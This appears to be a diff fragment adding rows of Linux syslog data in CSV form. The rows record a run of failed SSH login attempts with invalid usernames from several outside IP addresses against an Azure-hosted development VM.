+11526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:39,UbuntuDevEnv,2019-06-26 00:31:38,auth,UbuntuDevEnv,info,Disconnected from invalid user zg 104.248.121.67 port 43732 [preauth],73845,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zg,104.248.121.6,43732,,
+11527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:39,UbuntuDevEnv,2019-06-26 00:31:38,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 43732:11: Bye Bye [preauth],73845,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,43732,,
+11528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:43,UbuntuDevEnv,2019-06-26 00:31:43,auth,UbuntuDevEnv,info,Received disconnect from 139.59.81.180 port 42020:11: Bye Bye [preauth],73869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.59.81.1,42020,,
+11529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:43,UbuntuDevEnv,2019-06-26 00:31:43,auth,UbuntuDevEnv,info,Disconnected from 139.59.81.180 port 42020 [preauth],73869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.59.81.1,42020,,
+11530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:03,UbuntuDevEnv,2019-06-26 00:32:02,auth,UbuntuDevEnv,info,Invalid user rory from 186.31.116.78 port 43839,73942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rory,186.31.116.7,43839,,
+11531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:03,UbuntuDevEnv,2019-06-26 00:32:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,73942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:03,UbuntuDevEnv,2019-06-26 00:32:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:05,UbuntuDevEnv,2019-06-26 00:32:05,auth,UbuntuDevEnv,info,Failed password for invalid user rory from 186.31.116.78 port 43839 ssh2,73942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rory,186.31.116.7,43839,,
+11534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:05,UbuntuDevEnv,2019-06-26 00:32:05,auth,UbuntuDevEnv,info,Disconnected from invalid user rory 186.31.116.78 port 43839 [preauth],73942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rory,186.31.116.7,43839,,
+11535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:05,UbuntuDevEnv,2019-06-26 00:32:05,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 43839:11: Bye Bye [preauth],73942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,43839,,
+11536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:37,UbuntuDevEnv,2019-06-26 00:32:36,auth,UbuntuDevEnv,info,Invalid user admin from 118.222.146.186 port 43080,74059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,118.222.146.1,43080,,
+11537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:37,UbuntuDevEnv,2019-06-26 00:32:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:37,UbuntuDevEnv,2019-06-26 00:32:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,74059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:39,UbuntuDevEnv,2019-06-26 00:32:38,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 118.222.146.186 port 43080 ssh2,74059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,118.222.146.1,43080,,
+11540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:39,UbuntuDevEnv,2019-06-26 00:32:39,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 43080:11: Bye Bye [preauth],74059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,43080,,
+11541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:39,UbuntuDevEnv,2019-06-26 00:32:39,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 118.222.146.186 port 43080 [preauth],74059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,118.222.146.1,43080,,
+11542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:44,UbuntuDevEnv,2019-06-26 00:32:44,auth,UbuntuDevEnv,info,Invalid user smbprint from 114.112.81.180 port 44304,74088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smbprint,114.112.81.1,44304,,
+11543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:44,UbuntuDevEnv,2019-06-26 00:32:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:44,UbuntuDevEnv,2019-06-26 00:32:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,74088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:47,UbuntuDevEnv,2019-06-26 00:32:46,auth,UbuntuDevEnv,info,Failed password for invalid user smbprint from 114.112.81.180 port 44304 ssh2,74088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smbprint,114.112.81.1,44304,,
+11546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:48,UbuntuDevEnv,2019-06-26 00:32:47,auth,UbuntuDevEnv,info,Disconnected from invalid user smbprint 114.112.81.180 port 44304 [preauth],74088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smbprint,114.112.81.1,44304,,
+11547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:32:48,UbuntuDevEnv,2019-06-26 00:32:47,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 44304:11: Bye Bye [preauth],74088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,44304,,
+11548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:33:06,UbuntuDevEnv,2019-06-26 00:33:05,auth,UbuntuDevEnv,info,Invalid user artifactory from 104.248.121.67 port 52170,74168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,artifactory,104.248.121.6,52170,,
+11549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:33:06,UbuntuDevEnv,2019-06-26 00:33:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:33:06,UbuntuDevEnv,2019-06-26 00:33:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,74168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:33:07,UbuntuDevEnv,2019-06-26 00:33:07,auth,UbuntuDevEnv,info,Failed password for invalid user artifactory from 104.248.121.67 port 52170 ssh2,74168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,artifactory,104.248.121.6,52170,,
+11552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:33:07,UbuntuDevEnv,2019-06-26 00:33:07,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 52170:11: Bye Bye [preauth],74168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,52170,,
+11553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:33:07,UbuntuDevEnv,2019-06-26 00:33:07,auth,UbuntuDevEnv,info,Disconnected from invalid user artifactory 104.248.121.67 port 52170 [preauth],74168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,artifactory,104.248.121.6,52170,,
+11554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:33:36,UbuntuDevEnv,2019-06-26 00:33:35,auth,UbuntuDevEnv,info,Invalid user leon from 131.100.219.3 port 58670,74272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,leon,131.100.219.3,58670,,
+11555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:33:36,UbuntuDevEnv,2019-06-26 00:33:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:33:36,UbuntuDevEnv,2019-06-26 00:33:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,74272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:33:38,UbuntuDevEnv,2019-06-26 00:33:37,auth,UbuntuDevEnv,info,Failed password for invalid user leon from 131.100.219.3 port 58670 ssh2,74272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,leon,131.100.219.3,58670,,
+11558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:33:38,UbuntuDevEnv,2019-06-26 00:33:38,auth,UbuntuDevEnv,info,Disconnected from invalid user leon 131.100.219.3 port 58670 [preauth],74272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,leon,131.100.219.3,58670,,
+11559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:33:38,UbuntuDevEnv,2019-06-26 00:33:38,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 58670:11: Bye Bye [preauth],74272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,58670,,
+11560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:06,UbuntuDevEnv,2019-06-26 00:34:05,auth,UbuntuDevEnv,info,Invalid user admin from 186.31.116.78 port 52640,74379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,186.31.116.7,52640,,
+11561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:06,UbuntuDevEnv,2019-06-26 00:34:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:06,UbuntuDevEnv,2019-06-26 00:34:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,74379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:08,UbuntuDevEnv,2019-06-26 00:34:07,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 186.31.116.78 port 52640 ssh2,74379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,186.31.116.7,52640,,
+11564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:08,UbuntuDevEnv,2019-06-26 00:34:07,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 52640:11: Bye Bye [preauth],74379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,52640,,
+11565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:08,UbuntuDevEnv,2019-06-26 00:34:07,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 186.31.116.78 port 52640 [preauth],74379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,186.31.116.7,52640,,
+11566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:19,UbuntuDevEnv,2019-06-26 00:34:19,auth,UbuntuDevEnv,info,Invalid user user from 118.222.146.186 port 59844,74427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,118.222.146.1,59844,,
+11567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:19,UbuntuDevEnv,2019-06-26 00:34:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:19,UbuntuDevEnv,2019-06-26 00:34:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,74427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:21,UbuntuDevEnv,2019-06-26 00:34:21,auth,UbuntuDevEnv,info,Failed password for invalid user user from 118.222.146.186 port 59844 ssh2,74427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,118.222.146.1,59844,,
+11570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:22,UbuntuDevEnv,2019-06-26 00:34:21,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 59844:11: Bye Bye [preauth],74427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,59844,,
+11571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:22,UbuntuDevEnv,2019-06-26 00:34:21,auth,UbuntuDevEnv,info,Disconnected from invalid user user 118.222.146.186 port 59844 [preauth],74427,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,118.222.146.1,59844,,
+11572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:36,UbuntuDevEnv,2019-06-26 00:34:35,auth,UbuntuDevEnv,info,Invalid user guest from 104.248.121.67 port 60608,74489,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,104.248.121.6,60608,,
+11573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:36,UbuntuDevEnv,2019-06-26 00:34:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74489,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:36,UbuntuDevEnv,2019-06-26 00:34:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,74489,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:38,UbuntuDevEnv,2019-06-26 00:34:38,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 60608:11: Bye Bye [preauth],74489,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,60608,,
+11576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:38,UbuntuDevEnv,2019-06-26 00:34:38,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 104.248.121.67 port 60608 [preauth],74489,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,104.248.121.6,60608,,
+11577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:34:38,UbuntuDevEnv,2019-06-26 00:34:38,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 104.248.121.67 port 60608 ssh2,74489,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,104.248.121.6,60608,,
+11578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:35:50,UbuntuDevEnv,2019-06-26 00:35:50,auth,UbuntuDevEnv,info,Invalid user gitlab from 131.100.219.3 port 46838,74754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gitlab,131.100.219.3,46838,,
+11579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:35:50,UbuntuDevEnv,2019-06-26 00:35:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:35:50,UbuntuDevEnv,2019-06-26 00:35:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,74754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:35:53,UbuntuDevEnv,2019-06-26 00:35:52,auth,UbuntuDevEnv,info,Failed password for invalid user gitlab from 131.100.219.3 port 46838 ssh2,74754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gitlab,131.100.219.3,46838,,
+11582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:35:53,UbuntuDevEnv,2019-06-26 00:35:52,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 46838:11: Bye Bye [preauth],74754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,46838,,
+11583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:35:53,UbuntuDevEnv,2019-06-26 00:35:52,auth,UbuntuDevEnv,info,Disconnected from invalid user gitlab 131.100.219.3 port 46838 [preauth],74754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gitlab,131.100.219.3,46838,,
+11584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:04,UbuntuDevEnv,2019-06-26 00:36:03,auth,UbuntuDevEnv,info,Invalid user thibault from 104.248.121.67 port 40813,74803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,thibault,104.248.121.6,40813,,
+11585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:04,UbuntuDevEnv,2019-06-26 00:36:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
